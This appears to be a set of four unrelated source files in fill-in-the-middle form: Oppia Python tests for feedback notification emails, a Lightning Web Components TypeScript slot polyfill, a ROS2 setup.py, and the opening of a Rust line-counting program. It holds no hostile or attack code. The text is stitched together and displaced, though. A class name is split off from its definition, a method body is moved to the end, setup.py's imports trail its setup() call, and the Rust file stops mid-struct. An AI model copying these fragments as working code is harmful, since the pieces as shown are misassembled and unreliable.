self.assertEqual(
event_handler_call_counter_non_exploration.times_called, 0)
class | (test_utils.GenericTestBase):
"""Tests for tasks in emails taskqueue."""
def test_create_new_batch_task(self):
user_id = 'user'
feedback_services.enqueue_feedback_message_batch_email_task(user_id)
self.assertEqual(
self.count_jobs_in_taskqueue(taskqueue_services.QUEUE_NAME_EMAILS),
1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS)
def test_create_new_instant_task(self):
user_id = 'user'
reference_dict = {
'entity_type': 'exploration',
'entity_id': 'eid',
'thread_id': 'tid',
'message_id': 'mid'
}
reference = feedback_domain.FeedbackMessageReference(
reference_dict['entity_type'], reference_dict['entity_id'],
reference_dict['thread_id'], reference_dict['message_id'])
feedback_services.enqueue_feedback_message_instant_email_task(
user_id, reference)
self.assertEqual(
self.count_jobs_in_taskqueue(taskqueue_services.QUEUE_NAME_EMAILS),
1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
payload = json.loads(tasks[0].payload)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_INSTANT_FEEDBACK_EMAILS)
self.assertDictEqual(payload['reference_dict'], reference_dict)
class FeedbackMessageEmailTests(test_utils.GenericTestBase):
"""Tests for feedback message emails."""
def setUp(self):
super(FeedbackMessageEmailTests, self).setUp()
self.signup('[email protected]', 'A')
self.user_id_a = self.get_user_id_from_email('[email protected]')
self.signup('[email protected]', 'B')
self.user_id_b = self.get_user_id_from_email('[email protected]')
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_send_feedback_message_email(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 1)
expected_feedback_message_dict = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[0].message_id
}
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
model = feedback_models.UnsentFeedbackEmailModel.get(self.editor_id)
self.assertEqual(len(model.feedback_message_references), 1)
self.assertDictEqual(
model.feedback_message_references[0],
expected_feedback_message_dict)
self.assertEqual(model.retries, 0)
def test_add_new_feedback_message(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.user_id_a, None, None, 'editor message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 2)
expected_feedback_message_dict1 = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[0].message_id
}
expected_feedback_message_dict2 = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[1].message_id
}
model = feedback_models.UnsentFeedbackEmailModel.get(self.editor_id)
self.assertEqual(len(model.feedback_message_references), 2)
self.assertDictEqual(
model.feedback_message_references[0],
expected_feedback_message_dict1)
self.assertDictEqual(
model.feedback_message_references[1],
expected_feedback_message_dict2)
self.assertEqual(model.retries, 0)
def test_email_is_not_sent_recipient_has_muted_emails_globally(self):
user_services.update_email_preferences(
self.editor_id, True, False, False, False)
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_email_is_not_sent_recipient_has_muted_this_exploration(self):
user_services.set_email_preferences_for_exploration(
self.editor_id, self.exploration.id,
mute_feedback_notifications=True)
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_not_sent_for_anonymous_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id, None,
'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_sent_for_registered_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
def test_that_emails_are_not_sent_if_service_is_disabled(self):
cannot_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', False)
cannot_send_feedback_message_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', False)
with cannot_send_emails_ctx, cannot_send_feedback_message_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_not_sent_for_thread_status_changes(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', '')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_email_are_not_sent_to_author_himself(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.editor_id, 'a subject', 'A message')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_email_is_sent_for_reply_on_feedback(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
def test_that_email_is_sent_for_changing_status_of_thread(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None, '')
# There are two jobs in the taskqueue: one for the realtime
# event associated with changing subject of thread, and one for
# sending the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
def test_that_email_is_sent_for_each_feedback_message(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message2')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
def test_that_reply_to_id_is_created(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.user_id_b, None, None, 'user b message')
# Check that reply_to id is created for user A.
queried_object = (
email_services
.get_feedback_thread_reply_info_by_user_and_thread_ids(
self.user_id_a, thread_id))
self.assertEqual(queried_object.user_id, self.user_id_a)
self.assertEqual(queried_object.thread_id, thread_id)
feedback_services.create_message(
thread_id, self.user_id_a, None, None, 'user a message')
# Check that reply_to id is created for user B.
queried_object = (
email_services
.get_feedback_thread_reply_info_by_user_and_thread_ids(
self.user_id_b, thread_id))
self.assertEqual(queried_object.user_id, self.user_id_b)
self.assertEqual(queried_object.thread_id, thread_id)
class FeedbackMessageBatchEmailHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(FeedbackMessageBatchEmailHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_that_emails_are_sent(self):
expected_email_html_body = (
'Hi editor,<br>'
'<br>'
'You\'ve received a new message on your Oppia explorations:<br>'
'<ul>'
'<li><a href="https://www.oppia.org/create/A#/feedback">Title</a>:'
'<br>'
'<ul><li>some text<br></li>'
'</ul></li></ul>'
'You can view and reply to your messages from your '
'<a href="https://www.oppia.org/creator_dashboard">dashboard</a>.'
'<br>'
'<br>Thanks, and happy teaching!<br>'
'<br>'
'Best wishes,<br>'
'The Oppia Team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi editor,\n'
'\n'
'You\'ve received a new message on your Oppia explorations:\n'
'- Title:\n'
'- some text\n'
'You can view and reply to your messages from your dashboard.\n'
'\n'
'Thanks, and happy teaching!\n'
'\n'
'Best wishes,\n'
'The Oppia Team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_correct_emails_are_sent_for_multiple_feedback(self):
expected_email_html_body = (
'Hi editor,<br>'
'<br>'
'You\'ve received 2 new messages on your Oppia explorations:<br>'
'<ul>'
'<li><a href="https://www.oppia.org/create/A#/feedback">Title</a>:'
'<br>'
'<ul><li>some text<br></li>'
'<li>more text<br></li>'
'</ul></li></ul>'
'You can view and reply to your messages from your '
'<a href="https://www.oppia.org/creator_dashboard">dashboard</a>.'
'<br>'
'<br>Thanks, and happy teaching!<br>'
'<br>'
'Best wishes,<br>'
'The Oppia Team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi editor,\n'
'\n'
'You\'ve received 2 new messages on your Oppia explorations:\n'
'- Title:\n'
'- some text\n'
'- more text\n'
'You can view and reply to your messages from your dashboard.\n'
'\n'
'Thanks, and happy teaching!\n'
'\n'
'Best wishes,\n'
'The Oppia Team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.new_user_id,
feedback_models.STATUS_CHOICES_OPEN, 'subject', 'more text')
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 2)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(
to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_not_sent_if_already_seen(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_csrf_token_from_response(
self.testapp.get('/create/%s' % self.exploration.id))
self.post_json(
'%s/%s' % (
feconf.FEEDBACK_THREAD_VIEW_EVENT_URL, thread_id),
{'thread_id': thread_id}, csrf_token=csrf_token)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
class FeedbackMessageInstantEmailHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(FeedbackMessageInstantEmailHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_that_emails_are_sent_for_feedback_message(self):
expected_email_html_body = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: editor message<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: editor message\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_sent_for_status_change(self):
expected_email_html_body = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: changed status from open to fixed<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: changed status from open to fixed\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None, '')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_sent_for_both_status_change_and_message(self):
expected_email_html_body_message = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: editor message<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body_message = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: editor message\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
expected_email_html_body_status = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: changed status from open to fixed<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body_status = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: changed status from open to fixed\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None,
'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 2)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body_status)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body_status)
self.assertEqual(
messages[1].html.decode(), expected_email_html_body_message)
self.assertEqual(
messages[1].body.decode(), expected_email_text_body_message)
def test_that_emails_are_not_sent_to_anonymous_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
# Create thread as anonoymous user.
feedback_services.create_thread(
'exploration', self.exploration.id,
None, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None,
'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages()
self.assertEqual(len(messages), 0)
| EmailsTaskqueueTests |
slot.ts | /*
* Copyright (c) 2018, salesforce.com, inc.
* All rights reserved.
* SPDX-License-Identifier: MIT
* For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
*/
import {
assert,
defineProperties,
ArrayFilter,
ArrayIndexOf,
ArrayPush,
ArrayReduce,
ArraySlice,
forEach,
isNull,
isTrue,
isUndefined,
} from '@lwc/shared';
import {
getAttribute,
setAttribute,
assignedSlotGetter as originalElementAssignedSlotGetter,
shadowRootGetter,
} from '../env/element';
import { assignedSlotGetter as originalTextAssignedSlotGetter } from '../env/text';
import { dispatchEvent } from '../env/event-target';
import { MutationObserverObserve, MutationObserver } from '../env/mutation-observer';
import { childNodesGetter, parentNodeGetter } from '../env/node';
import {
assignedNodes as originalAssignedNodes,
assignedElements as originalAssignedElements,
} from '../env/slot';
import { isInstanceOfNativeShadowRoot } from '../env/shadow-root';
import {
isSlotElement,
getNodeOwner,
getAllMatches,
getFilteredChildNodes,
getFilteredSlotAssignedNodes,
} from '../faux-shadow/traverse';
import { getNodeOwnerKey, isNodeShadowed } from '../shared/node-ownership';
import { createStaticNodeList } from '../shared/static-node-list';
import { arrayFromCollection } from '../shared/utils';
// We can use a single observer without having to worry about leaking because
// "Registered observers in a node’s registered observer list have a weak
// reference to the node."
// https://dom.spec.whatwg.org/#garbage-collection
let observer: MutationObserver | undefined;
const observerConfig: MutationObserverInit = { childList: true };
const SlotChangeKey = new WeakMap<any, boolean>();
function initSlotObserver() {
return new MutationObserver((mutations) => {
const slots: Node[] = [];
forEach.call(mutations, (mutation) => {
if (process.env.NODE_ENV !== 'production') {
assert.invariant(
mutation.type === 'childList',
`Invalid mutation type: ${mutation.type}. This mutation handler for slots should only handle "childList" mutations.`
);
}
const { target: slot } = mutation;
if (ArrayIndexOf.call(slots, slot) === -1) {
ArrayPush.call(slots, slot);
dispatchEvent.call(slot, new CustomEvent('slotchange'));
}
});
});
}
function getFilteredSlotFlattenNodes(slot: HTMLElement): Node[] {
const childNodes = arrayFromCollection(childNodesGetter.call(slot));
// Typescript is inferring the wrong function type for this particular
// overloaded method: https://github.com/Microsoft/TypeScript/issues/27972
// @ts-ignore type-mismatch
return ArrayReduce.call(
childNodes,
(seed, child) => {
if (child instanceof Element && isSlotElement(child)) {
ArrayPush.apply(seed, getFilteredSlotFlattenNodes(child));
} else {
ArrayPush.call(seed, child);
}
return seed;
},
[]
);
}
export function assignedSlotGetterPatched(this: Element | Text): HTMLSlotElement | null {
const parentNode = parentNodeGetter.call(this);
// use original assignedSlot if parent has a native shdow root
if (parentNode instanceof Element) {
const sr = shadowRootGetter.call(parentNode);
if (isInstanceOfNativeShadowRoot(sr)) {
if (this instanceof Text) {
return originalTextAssignedSlotGetter.call(this);
}
return originalElementAssignedSlotGetter.call(this);
}
}
/**
* The node is assigned to a slot if:
* - it has a parent and its parent is a slot element
* - and if the slot owner key is different than the node owner key.
*
* When the slot and the slotted node are 2 different shadow trees, the owner keys will be
* different. When the slot is in a shadow tree and the slotted content is a light DOM node,
* the light DOM node doesn't have an owner key and therefor the slot owner key will be
* different than the node owner key (always `undefined`).
*/
if (
!isNull(parentNode) &&
isSlotElement(parentNode) &&
getNodeOwnerKey(parentNode) !== getNodeOwnerKey(this)
) {
return parentNode;
}
return null;
}
defineProperties(HTMLSlotElement.prototype, {
addEventListener: {
value(
this: HTMLSlotElement,
type: string,
listener: EventListener,
options?: boolean | AddEventListenerOptions
) {
// super.addEventListener - but that doesn't work with typescript
HTMLElement.prototype.addEventListener.call(this, type, listener, options);
if (type === 'slotchange' && !SlotChangeKey.get(this)) {
SlotChangeKey.set(this, true);
if (!observer) {
observer = initSlotObserver();
}
MutationObserverObserve.call(observer, this, observerConfig);
}
},
writable: true,
enumerable: true,
configurable: true,
},
assignedElements: {
value(this: HTMLSlotElement, options?: AssignedNodesOptions): Element[] {
if (isNodeShadowed(this)) {
const flatten = !isUndefined(options) && isTrue(options.flatten);
const nodes = flatten
? getFilteredSlotFlattenNodes(this)
: getFilteredSlotAssignedNodes(this);
return ArrayFilter.call(nodes, (node) => node instanceof Element);
} else {
return originalAssignedElements.apply(
this,
ArraySlice.call(arguments) as [AssignedNodesOptions]
);
}
},
writable: true,
enumerable: true,
configurable: true,
},
assignedNodes: {
value(this: HTMLSlotElement, options?: AssignedNodesOptions): Node[] {
if (isNodeShadowed(this)) { | : getFilteredSlotAssignedNodes(this);
} else {
return originalAssignedNodes.apply(
this,
ArraySlice.call(arguments) as [AssignedNodesOptions]
);
}
},
writable: true,
enumerable: true,
configurable: true,
},
name: {
get(this: HTMLSlotElement): string {
const name = getAttribute.call(this, 'name');
return isNull(name) ? '' : name;
},
set(this: HTMLSlotElement, value: string) {
setAttribute.call(this, 'name', value);
},
enumerable: true,
configurable: true,
},
childNodes: {
get(this: HTMLSlotElement): NodeListOf<Node> {
if (isNodeShadowed(this)) {
const owner = getNodeOwner(this);
const childNodes = isNull(owner)
? []
: getAllMatches(owner, getFilteredChildNodes(this));
return createStaticNodeList(childNodes);
}
return childNodesGetter.call(this);
},
enumerable: true,
configurable: true,
},
}); | const flatten = !isUndefined(options) && isTrue(options.flatten);
return flatten
? getFilteredSlotFlattenNodes(this) |
setup.py | import os |
package_name = 'ros2_sub'
setup(
name=package_name,
version='0.0.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
(os.path.join('share', package_name), glob('launch/*.py')),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='ragesh_ramachandran',
maintainer_email='[email protected]',
description='TODO: Package description',
license='TODO: License declaration',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'number_subscriber = ros2_sub.main:main'
],
},
) | from glob import glob
from setuptools import setup |
main.rs | #[cfg(test)]
mod test;
fn main() {
let mut args = std::env::args();
args.next();
let mut sum = 0;
for arg in args {
match std::fs::read_to_string(arg.as_str()){
Ok(content)=> {
let count = count(content.as_str());
sum += count;
println!("{}: {} lines",arg,count);
},
Err(_)=> {
println!("{}: could not read file!",arg);
}
}
}
println!("\nsum: {} lines",sum);
}
struct CounterStatus {
counter:usize,
